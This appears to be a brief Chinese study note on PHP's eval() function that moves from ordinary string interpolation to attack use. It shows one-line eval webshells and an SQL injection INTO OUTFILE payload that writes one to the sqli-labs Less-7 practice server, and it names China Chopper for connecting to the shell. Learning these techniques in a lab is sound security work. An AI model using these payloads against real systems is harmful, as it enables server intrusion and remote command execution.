eval 函數
eval() 函數把字符串按照 PHP 代碼來計算
該字符串必須是合法的 PHP 代碼,且必須以分號結尾
如果沒有在代碼字符串中調用 return 語句,則返回 NULL。如果代碼中存在解析錯誤,則 eval() 函數返回 false
eval 函數的一般用法
eval() 函數用於簡單的文本合並
<?php $string='cup'; $name='coffee'; $str='This is a $string with my $name in it.'; echo $str."\n"; eval("\$str=\"$str\";"); echo $str."\n"; ?>
以上例程會輸出
eval() 函數的特殊用法
用於構造一句話木馬
eval($_GET["cmd"]);
兩種方式
通過數據庫寫馬
環境:sql_labs Less-7
寫入一句話木馬
union select 1,2,'<?php eval($_POST["cmd"]);?>' into outfile 'd:/wampserver/wamp64/www/sqli/sqli/Less-7/twx.txt'%23
使用中國菜刀進行連接
可以訪問並操作服務器文件
通過PHP 文件寫馬
<?php eval($_GET["cmd"]); ?>
訪問PHP 文件,查看phpinfo()
